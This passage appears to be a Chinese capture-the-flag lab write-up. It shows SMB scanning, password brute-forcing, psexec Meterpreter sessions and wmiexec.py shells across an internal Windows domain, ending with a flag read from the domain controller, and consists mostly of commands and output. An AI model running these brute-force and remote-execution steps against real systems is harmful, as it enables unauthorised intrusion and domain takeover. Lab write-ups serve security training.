[-] 192.168.93.4:139 - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:139 - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:139 - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.6:445 - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:445 - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:445 - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:445 - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[+] 192.168.93.10:445 - Host is running SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[-] 192.168.93.6:139 - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:139 - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:139 - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:139 - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:445 - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:445 - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:445 - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:445 - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:445 - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:139 - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:139 - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:139 - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:139 - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:139 - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.20:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[+] 192.168.93.20:445 - Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[-] 192.168.93.16:445 - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:445 - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:445 - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:445 - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.16:139 - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:139 - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:139 - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:139 - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:445 - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:445 - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:445 - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:445 - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:445 - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:139 - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:139 - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:139 - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:139 - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:139 - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.0-255: - Scanned 26 of 256 hosts (10% complete)
[-] 192.168.93.26:445 - 192.168.93.26: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.30:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)
[+] 192.168.93.30:445 - Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)还是三台内网主机192.168.93.10 name:WIN-8GA56TNV3MV domain:TEST
192.168.93.20 name:WIN2008 domain:TEST
192.168.93.30 name:WIN7 domain:TEST6、内网攻击
1、密码爆破
使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破192.168.93.10/20/30的密码msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show optionsModule options (auxiliary/scanner/smb/smb_login):Name Current Setting Required Description---- --------------- -------- -----------ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detectedBLANK_PASSWORDS false no Try blank passwords for all usersBRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5DB_ALL_CREDS false no Try each user/password couple stored in the current databaseDB_ALL_PASS false no Add all passwords in the current database to the listDB_ALL_USERS false no Add all users in the current database to the listDB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)DETECT_ANY_AUTH false no Enable detection of systems accepting any authenticationDETECT_ANY_DOMAIN false no Detect if domain is required for the specified userPASS_FILE no File containing passwords, one per linePRESERVE_DOMAINS true no Respect a username that contains a domain name.Proxies no A proxy chain of format type:host:port[,type:host:port][...]RECORD_GUEST false no Record guest-privileged random logins to the databaseRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 445 yes The SMB service port (TCP)SMBDomain . no The Windows domain to use for authenticationSMBPass no The password for the specified usernameSMBUser no The username to authenticate asSTOP_ON_SUCCESS false yes Stop guessing when a credential works for a hostTHREADS 1 yes The number of concurrent threads (max one per host)USERPASS_FILE no File containing users and passwords separated by space, one pair per lineUSER_AS_PASS false no Try the username as the password for all usersUSER_FILE no File containing usernames, one per lineVERBOSE true yes Whether to print output for all attemptsView the full module info with the info, or info -d command.msf6 auxiliary(scanner/smb/smb_login) > set SMBUser administrator
SMBUser => administrator
msf6 auxiliary(scanner/smb/smb_login) > run[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run[*] 192.168.93.30:445 - 192.168.93.10:445 - Starting SMB login bruteforce
[*] 192.168.93.30:445 - Error: 192.168.93.30: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::SMB)
[*] 192.168.93.30:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >这个报错是因为没有加载爆破字典
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txtmsf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > runmsf6 auxiliary(scanner/smb/smb_login) > run[*] 192.168.93.30:445 - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.30:445 - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administratormsf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 auxiliary(scanner/smb/smb_login) > run[*] 192.168.93.20:445 - 192.168.93.20:445 - Starting SMB login bruteforce
[-] 192.168.93.20:445 - 192.168.93.20:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.20:445 - No active DB -- Credential data will not be saved!
[-] 192.168.93.20:445 - 192.168.93.20:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.20:445 - 192.168.93.20:445 - Success: '.\administrator:123qwe!ASD' Administrator
^C[*] 192.168.93.20:445 - Caught interrupt from the console...
[*] Auxiliary module execution completedmsf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10msf6 auxiliary(scanner/smb/smb_login) > run[*] 192.168.93.10:445 - 192.168.93.10:445 - Starting SMB login bruteforce
[-] 192.168.93.10:445 - 192.168.93.10:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.10:445 - No active DB -- Credential data will not be saved!
[+] 192.168.93.10:445 - 192.168.93.10:445 - Success: '.\administrator:zxcASDqw123!!' Administrator
^C[*] 192.168.93.10:445 - Caught interrupt from the console...
[*] Auxiliary module execution completed192.168.93.30 administrator:123qwe!ASD
192.168.93.20 administrator:123qwe!ASD
192.168.93.10 administrator:zxcASDqw123!!这样我们就已经拿到所有主机的密码了。
2、psexec工具
利用psexec工具进行攻击内网主机。
192.168.93.30攻击流程msf6 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf6 exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD
SMBPass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 exploit(windows/smb/psexec) > show optionsModule options (exploit/windows/smb/psexec):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS 192.168.93.30 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 445 yes The SMB service port (TCP)SERVICE_DESCRIPTI no Service description to be useON d on target for pretty listingSERVICE_DISPLAY_N no The service display nameAMESERVICE_NAME no The service nameSMBDomain . no The Windows domain to use forauthenticationSMBPass 123qwe!ASD no The password for the specified usernameSMBSHARE no The share to connect to, canbe an admin share (ADMIN$,C$,...) or a normal read/write folder shareSMBUser administrator no The username to authenticateasPayload options (windows/x64/meterpreter/bind_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)LPORT 4444 yes The listen portRHOST 192.168.93.30 no The target addressExploit target:Id Name-- ----0 AutomaticView the full module info with the info, or info -d command.msf6 exploit(windows/smb/psexec) > run[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'...
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Executing the payload...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (200774 bytes) to 192.168.93.30
[*] Meterpreter session 5 opened (192.168.93.100:34678 -> 192.168.93.30:4444 via session 4) at 2023-12-04 10:28:38 +0800meterpreter >查找域控主机meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/enum_domain[+] Domain FQDN: test.org
[+] Domain NetBIOS Name: TEST
[+] Domain Controller: WIN-8GA56TNV3MV.test.org (IP: 192.168.93.10)
meterpreter >域控主机为192.168.93.10
信息收集meterpreter > shell
Process 1228 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Windows\system32>ipconfig /all
ipconfig /allWindows IP ConfigurationHost Name . . . . . . . . . . . . : win7Primary Dns Suffix . . . . . . . : test.orgNode Type . . . . . . . . . . . . : HybridIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : NoDNS Suffix Search List. . . . . . : test.orgEthernet adapter Bluetooth Network Connection:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . :Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)Physical Address. . . . . . . . . : 3C-55-76-DC-AB-F6DHCP Enabled. . . . . . . . . . . : YesAutoconfiguration Enabled . . . . : YesEthernet adapter Local Area Connection:Connection-specific DNS Suffix . :Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network ConnectionPhysical Address. . . . . . . . . : 00-0C-29-E0-74-2BDHCP Enabled. . . . . . . . . . . : NoAutoconfiguration Enabled . . . . : YesLink-local IPv6 Address . . . . . : fe80::fcc9:1e77:245c:9cf3%11(Preferred)IPv4 Address. . . . . . . . . . . : 192.168.93.30(Preferred)Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . :DHCPv6 IAID . . . . . . . . . . . : 234884137DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-53-70-00-0C-29-E0-74-2BDNS Servers . . . . . . . . . . . : 192.168.93.10NetBIOS over Tcpip. . . . . . . . : EnabledTunnel adapter isatap.{9155D380-FF00-44EB-AE88-938EA5D2CAB2}:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . :Description . . . . . . . . . . . : Microsoft ISATAP AdapterPhysical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP Enabled. . . . . . . . . . . : NoAutoconfiguration Enabled . . . . : YesTunnel adapter isatap.{A0E4F0B0-B72B-4DC5-8935-EA51628015E2}:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . :Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP Enabled. . . . . . . . . . . : NoAutoconfiguration Enabled . . . . : YesC:\Windows\system32>net user
net userUser accounts for \\-------------------------------------------------------------------------------
Administrator Guest3、wmiexec.py
wmiexec.py 是一个工具,用于在 Windows 操作系统上执行 WMI (Windows Management Instrumentation) 命令和脚本。WMI 是微软 Windows 管理架构的一部分,可用于管理和监控本地和远程计算机上的各种系统资源和服务。wmiexec.py 工具允许用户在命令行界面上执行各种 WMI 命令和脚本,并与远程计算机进行通信。该工具通常被用于系统管理、故障排除和远程执行任务。192.168.93.20攻击流程┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains4 python3 wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.20:445 ... OK
[*] SMBv2.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.20:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.20:49154 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /allWindows IP ConfigurationHost Name . . . . . . . . . . . . : win2008Primary Dns Suffix . . . . . . . : test.orgNode Type . . . . . . . . . . . . : HybridIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : NoDNS Suffix Search List. . . . . . : test.orgEthernet adapter Local Area Connection:Connection-specific DNS Suffix . :Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network ConnectionPhysical Address. . . . . . . . . : 00-0C-29-AB-44-ECDHCP Enabled. . . . . . . . . . . : NoAutoconfiguration Enabled . . . . : YesLink-local IPv6 Address . . . . . : fe80::e9c2:7728:85f1:d04f%10(Preferred)IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . :DHCPv6 IAID . . . . . . . . . . . : 234884137DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-55-47-00-0C-29-AB-44-ECDNS Servers . . . . . . . . . . . : 192.168.93.10NetBIOS over Tcpip. . . . . . . . : EnabledTunnel adapter Local Area Connection* 8:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . :Description . . . . . . . . . . . : isatap.{964D2F17-AE7C-4B46-9E2B-EB123D2EEFEA}Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP Enabled. . . . . . . . . . . : NoAutoconfiguration Enabled . . . . : YesC:\>net userUser accounts for \\-------------------------------------------------------------------------------
Administrator Guest
The command completed with one or more errors.192.168.93.10攻击流程┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:49154 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /allWindows IP ConfigurationHost Name . . . . . . . . . . . . : WIN-8GA56TNV3MVPrimary Dns Suffix . . . . . . . : test.orgNode Type . . . . . . . . . . . . : HybridIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : NoDNS Suffix Search List. . . . . . : test.orgEthernet adapter Ethernet0:Connection-specific DNS Suffix . :Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network ConnectionPhysical Address. . . . . . . . . : 00-0C-29-1F-54-D2DHCP Enabled. . . . . . . . . . . : NoAutoconfiguration Enabled . . . . : YesLink-local IPv6 Address . . . . . : fe80::1fa:2f8:97ac:1160%12(Preferred)IPv4 Address. . . . . . . . . . . : 192.168.93.10(Preferred)Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . :DHCPv6 IAID . . . . . . . . . . . : 301993001DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-57-BB-00-0C-29-1F-54-D2DNS Servers . . . . . . . . . . . : ::1127.0.0.1NetBIOS over Tcpip. . . . . . . . : EnabledTunnel adapter isatap.{22AC77BB-4205-4120-89CB-C8F5240403E0}:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . :Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP Enabled. . . . . . . . . . . : NoAutoconfiguration Enabled . . . . : YesC:\>net userUser accounts for \\-------------------------------------------------------------------------------
Administrator Guest krbtgt
win2008 win7
The command completed with one or more errors.C:\Users\Administrator\Desktop>whoami
test\administratorok,利用impacket包里的wmiexec.py脚本成功将内网主机win2008(192.168.93.20)、WIN-8GA56TNV3MV(192.168.93.10 内网主机)打穿了。
7、get flag
┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:49154 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dirVolume in drive C has no label.Volume Serial Number is D6DC-065ADirectory of C:\08/22/2013 11:52 PM <DIR> PerfLogs
10/28/2019 08:44 PM <DIR> Program Files
08/22/2013 11:39 PM <DIR> Program Files (x86)
10/06/2019 07:14 PM <DIR> Users
12/04/2023 11:18 AM <DIR> Windows0 File(s) 0 bytes5 Dir(s) 52,819,361,792 bytes freeC:\>cd Users
C:\Users>dirVolume in drive C has no label.Volume Serial Number is D6DC-065ADirectory of C:\Users10/06/2019 07:14 PM <DIR> .
10/06/2019 07:14 PM <DIR> ..
10/06/2019 07:14 PM <DIR> Administrator
08/22/2013 11:39 PM <DIR> Public0 File(s) 0 bytes4 Dir(s) 52,819,361,792 bytes freeC:\Users>cd Administrator
C:\Users\Administrator>dirVolume in drive C has no label.Volume Serial Number is D6DC-065ADirectory of C:\Users\Administrator10/06/2019 07:14 PM <DIR> .
10/06/2019 07:14 PM <DIR> ..
10/30/2019 10:12 PM <DIR> Contacts
10/31/2019 12:52 AM <DIR> Desktop
10/31/2019 12:52 AM <DIR> Documents
10/30/2019 10:12 PM <DIR> Downloads
10/30/2019 10:12 PM <DIR> Favorites
10/30/2019 10:12 PM <DIR> Links
10/30/2019 10:12 PM <DIR> Music
10/30/2019 10:12 PM <DIR> Pictures
10/30/2019 10:12 PM <DIR> Saved Games
10/30/2019 10:12 PM <DIR> Searches
10/30/2019 10:12 PM <DIR> Videos0 File(s) 0 bytes13 Dir(s) 52,819,357,696 bytes freeC:\Users\Administrator>cd Documents
C:\Users\Administrator\Documents>dirVolume in drive C has no label.Volume Serial Number is D6DC-065ADirectory of C:\Users\Administrator\Documents10/31/2019 12:52 AM <DIR> .
10/31/2019 12:52 AM <DIR> ..
10/31/2019 12:53 AM 13 flag.txt1 File(s) 13 bytes2 Dir(s) 52,819,361,792 bytes freeC:\Users\Administrator\Documents>type flag.txt
this is flag!
C:\Users\Administrator\Documents>最终我们在域控主机内拿到重要文件flag.txt文件。
